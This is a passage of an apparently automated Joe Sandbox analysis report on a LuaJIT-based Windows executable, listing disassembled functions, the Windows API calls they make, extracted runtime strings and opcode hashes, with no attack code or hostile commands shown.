                                                        • Part of subcall function 00007FF73AF39294: GetLastError.KERNEL32(?,?,?,00007FF73AF48C78,?,?,?,00007FF73AF48FFB,?,?,00000019,00007FF73AF496D0,?,?,?,00007FF73AF49603), ref: 00007FF73AF392BC
                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF73AF42ED0), ref: 00007FF73AF42CEB
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 3458911817-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                      • String ID: ?
                                                      • API String ID: 1286766494-1684325040
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: InfoLocaletry_get_function
                                                      • String ID: GetLocaleInfoEx
                                                      • API String ID: 2200034068-2904428671
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage
                                                      • String ID:
                                                      • API String ID: 3479602957-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39D6B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39D8A
                                                        • Part of subcall function 00007FF73AF39378: GetProcAddress.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF394D0
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39DA9
                                                        • Part of subcall function 00007FF73AF39378: LoadLibraryW.KERNELBASE(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF3941B
                                                        • Part of subcall function 00007FF73AF39378: GetLastError.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF39429
                                                        • Part of subcall function 00007FF73AF39378: LoadLibraryExW.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF3946B
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39DC8
                                                        • Part of subcall function 00007FF73AF39378: FreeLibrary.KERNEL32(?,?,00000002,00007FF73AF39856,?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01), ref: 00007FF73AF394A4
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39DE7
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E06
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E25
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E44
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E63
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39E82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                      • API String ID: 3255926029-3252031757
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm$_free_nolock
                                                      • String ID: .\?.dll;!\?.dll;!\loadall.dll$.\?.lua;!\lua\?.lua;!\lua\?\init.lua;$LUA_CPATH$LUA_NOENV$LUA_PATH$\;?!-$_LOADED$_LOADLIB$_PRELOAD$__gc$config$cpath$loaded$loaders$package$path$preload
                                                      • API String ID: 338564694-1474762456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: wcsxfrm
                                                      • String ID: %s:$...$[builtin#%d]:$ at %p$ in function '%s'$ in function <%s:%d>$ in main chunk$%d:$%s$Snlf$stack traceback:
                                                      • API String ID: 1214967616-750625491
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolockwcsftime
                                                      • String ID: day$hour$isdst$min$month$sec$wday$yday$year
                                                      • API String ID: 793903186-297742768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: AddressProc$CreateCriticalInitializeLibraryLoadSectionThread
                                                      • String ID: timeBeginPeriod$timeEndPeriod$winmm.dll
                                                      • API String ID: 4260375681-184456188
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: -$f$p$p
                                                      • API String ID: 3215553584-2516539321
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 849930591-393685449
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F481
                                                      • GetLastError.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F48F
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F4B9
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F4FF
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF73AF0F6AE,?,?,?,00007FF73AF0F3A0,?,?,00000001,00007FF73AF0F135), ref: 00007FF73AF0F50B
                                                      Strings
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Similarity
                                                      • API ID:
                                                      • String ID: =[C]$Lua$main
                                                      • API String ID: 0-2004024069
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID: C$I$J$N
                                                      • API String ID: 3168844106-327184588
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$cosh
                                                      • API String ID: 1156100317-3800341493
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                      • String ID: csm$csm
                                                      • API String ID: 851805269-3733052814
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: type_info::_name_internal_method
                                                      • String ID: builtin#$false$nil$true
                                                      • API String ID: 3713626258-3570738779
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_mbsncpy_s
                                                      • String ID: (error object is not a string)$=(debug command)$cont$lua_debug>
                                                      • API String ID: 1341846612-1452030528
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Similarity
                                                      • API ID: _free_nolock_mbsncpy_s
                                                      • String ID: no field package.preload['%s']$'package.preload' must be a table$luaJIT_BC_%s$preload
                                                      • API String ID: 1937151238-4005544233
                                                      • Opcode ID: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction ID: 03e133a081923ad844d766e1460e8ec3cf095259369042d61b975994b80a70bb
                                                      • Opcode Fuzzy Hash: ae728f4becdb446dc012175d8b8f057be525cdf9ebc50b6f98fe9e2db2f7ebdd
                                                      • Instruction Fuzzy Hash: EF217169958A8291F720BB65E8431AAE350FBC43E0F801372F9AD477E9CE6CD4019B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction ID: f85c4b63a3fb9385d7dd6554be9ab52be0f2ff5f291324e22460022a944f5b8b
                                                      • Opcode Fuzzy Hash: 2d3564b58b9cb606e05f0e38798506940211f3724d7b41a856236d5833a03c23
                                                      • Instruction Fuzzy Hash: 4FF0BEA9B18B47A1FF447B20E482375A360EF88781FC014B9D44F46664CF2CE288D320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF73AF3CE26
                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3,?,?,FFFFFFFE,00007FF73AF3D196), ref: 00007FF73AF3CEE4
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF73AF3CDA3,?,?,FFFFFFFE,00007FF73AF3D196), ref: 00007FF73AF3CF6E
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 2210144848-0
                                                      • Opcode ID: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction ID: cdfac7c229034fe0b955fb644219cbd13fb5b769779a655b5025d3979d29d74b
                                                      • Opcode Fuzzy Hash: d1febf673d703c9a692e54b83532147798bcc06cb3c06aafb1355438f7c6e3e3
                                                      • Instruction Fuzzy Hash: 0D81926AF18613A9FB10BB6584466BCE661AF44B88FC40271DE0E536D5DF3EE446E330
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction ID: b3a675cc54dd7df8f1384b0cd8905e690bd189ae8887cc153926f10618d5d32a
                                                      • Opcode Fuzzy Hash: 799261281b30a15e4dafbe70f8b889fd4baea56ba5803dfc389231a0df8f540d
                                                      • Instruction Fuzzy Hash: 5951F91ED0C987A6F722BE38980237AE250BF41394F848275E95E1E6D1DF3DE481E720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID:
                                                      • API String ID: 1156100317-0
                                                      • Opcode ID: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction ID: b7ef9a13abc5e4608768400ef1f0d791a8e28ee4e822d130fb05a215ccac96c2
                                                      • Opcode Fuzzy Hash: 12683ee949a498a76d615f5c80dca171e6a4e98699c78b4ade9d4b7d37fa3cf1
                                                      • Instruction Fuzzy Hash: 9811422EE18A0731F7583524E84737991406F64374FD406B6EA6F0E3D6DE5EE841A324
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: AddressProc$HandleModule
                                                      • String ID:
                                                      • API String ID: 667068680-0
                                                      • Opcode ID: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction ID: e3fc5f19c932ae36b90460373ac2937cb8adaff7860a19a10b28c297b98cb30b
                                                      • Opcode Fuzzy Hash: 5bba9cc2eff1bf7a6b9eed0e22f4533ed8bb710fbb5761d34dfbe2c1f93b6363
                                                      • Instruction Fuzzy Hash: 77012D7A54CE8291EB60BB14F45632BA7B0FB887C4F504175EACE42668CF3CD654DB14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                      • API String ID: 3215553584-1196891531
                                                      • Opcode ID: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction ID: 86ffc4b34562b17e9305b6fdaa195a99746666cd53b54fda7d3607b6b3a7902c
                                                      • Opcode Fuzzy Hash: 62cfa22d59addd589a4e3312643b63144ee0171c148e141a576d728c4f9faa20
                                                      • Instruction Fuzzy Hash: DF81E67AD0D247A5FB657E288246238EB909F02748FD45AB5C90E475D5EA3FE801B322
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction ID: b7977754b320cab53579e29e4261446ad9e469df9e44b5e0f694dce1d6dec76d
                                                      • Opcode Fuzzy Hash: 0f06c74284d486cf50fce8b43e04ae6d09846b976987c370e94c47f60e81af7a
                                                      • Instruction Fuzzy Hash: 3B819D7AD0C207A6FBA4BF29805647CF7A0EB01B58FD400B5CA4947394DF39E841EB25
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                      • Instruction ID: 1800bbd83905c09d9a49097eda78fd203c886a3fcfd567f7fb613462d20d14cd
                                                      • Opcode Fuzzy Hash: 1efd0dc201afb6cb2df87b51b1532de0c6c955aa486bde14bcc7542939fd6564
                                                      • Instruction Fuzzy Hash: 4581B2BA80C643A6FB64AF65804617CFBA0EB52B44F9401B5CA4D47385CF3DE481E7B5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                      • Instruction ID: 40660b059b51744b1258c3f3189d937d9cf53f4b5031f094574c759f746d19d3
                                                      • Opcode Fuzzy Hash: aebac3cd1a26833e2af55c486e265236ad524e294da917c66b7e0629587f9230
                                                      • Instruction Fuzzy Hash: 8D819F7A908203A6FBE4BF298057078B7A4EB10B48FD440B5CA494B298DF3DE445EB34
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: $*
                                                      • API String ID: 3215553584-3982473090
                                                      • Opcode ID: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                      • Instruction ID: 6db3a933cfe73900aee0509521be3f2aba63a4057b31e6a6e1aff846815bc1ab
                                                      • Opcode Fuzzy Hash: 1b04caf276477af04b5d885976e20d85ac384d2c75b85c1de0808b5f727b4059
                                                      • Instruction Fuzzy Hash: 8881857A90C24BDAFB64AF25814707CBBE1EB01B88F9401B5CA4946395CF3DE441EB31
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: "$sinh
                                                      • API String ID: 1156100317-1232919748
                                                      • Opcode ID: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                      • Instruction ID: b77a58d94786cd32ce241769c75c0cb994d837e935628551f1c6ee6f266c9f48
                                                      • Opcode Fuzzy Hash: d4441f1067829586646d6e403ae08bbbbe116838e7bd38d72df8aa425cad948a
                                                      • Instruction Fuzzy Hash: 5091F42AD28F8699E6739B34A0423B6F314AF5A3D5F518323E58F31A51DF2CE1439710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      Similarity
                                                      • API ID: CallEncodePointerTranslator
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3544855599-2084237596
                                                      • Opcode ID: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                      • Instruction ID: c4b20eea5f2d203020317a2b82fc5ef4a4aaf90b1663ab00cf7a2968bec1ebe2
                                                      • Opcode Fuzzy Hash: 36655cc38fdb37db5713a354792fa09f1dfbcf1d55a9f2e70b9818b2607edb59
                                                      • Instruction Fuzzy Hash: 9F61673AA08A46DAF710EF66D0413ADB7A0FB44B98F844275EE4D17B99CB38E145C750
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Unwind__except_validate_context_record
                                                      • String ID: csm$f
                                                      • API String ID: 2208346422-629598281
                                                      • Opcode ID: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                      • Instruction ID: a19e2925c076b87adff3c025b632c448ce3bf7d0bade528b04a29b2c1126c001
                                                      • Opcode Fuzzy Hash: d98e7a07f294c52037bc1436f4614ab14783cba3f9a043537fabdfeef2d51ec6
                                                      • Instruction Fuzzy Hash: 0451C03AB09643AAFB14EB15E805A39B795FB44B98F908070DA0E43788DF79ED41E711
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$acos
                                                      • API String ID: 1156100317-2870037509
                                                      • Opcode ID: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                      • Instruction ID: 2b94011b533a6658a8b812bd339d6a07efa1d1e698694113fa47591a8ba16606
                                                      • Opcode Fuzzy Hash: bf72582c257df8192f41e73549c3bb19c3b6f1f999e55f766029dc027c0b68c3
                                                      • Instruction Fuzzy Hash: 8F611869C2CF4799FA27EF349452276D714AFA63D0F518372E91E31964DF2CE082A710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _set_statfp
                                                      • String ID: !$asin
                                                      • API String ID: 1156100317-2188059690
                                                      • Opcode ID: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                      • Instruction ID: e72f93b0eeff52adf35cfd0297136fd9068da3169f579324e161a8d4a852812f
                                                      • Opcode Fuzzy Hash: 9e38084c10780cd626a2090b3a56498ae94656eafe0a602bef55e7ad367d1a5b
                                                      • Instruction Fuzzy Hash: EF512B69C3CF4795F617EB349852276D314BFA6380F918376E92E35A60CF2CE082A710
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _free_nolock
                                                      • String ID: luaJIT_BC_%s$luaopen_%s$path too long
                                                      • API String ID: 2882679554-1241789697
                                                      • Opcode ID: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                      • Instruction ID: 7de88efb2a76228b26e377e69af7a578a6629c3c3ec119783cbcdfb5942932f8
                                                      • Opcode Fuzzy Hash: 5dea574ca3d95739399a95e25b92153f106047c46926396060786645f98203ee
                                                      • Instruction Fuzzy Hash: F651203AA5CA85D1F760BB15E44336AA7A1F7C47D0F904572EA8E43BA9CF3CD4409B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
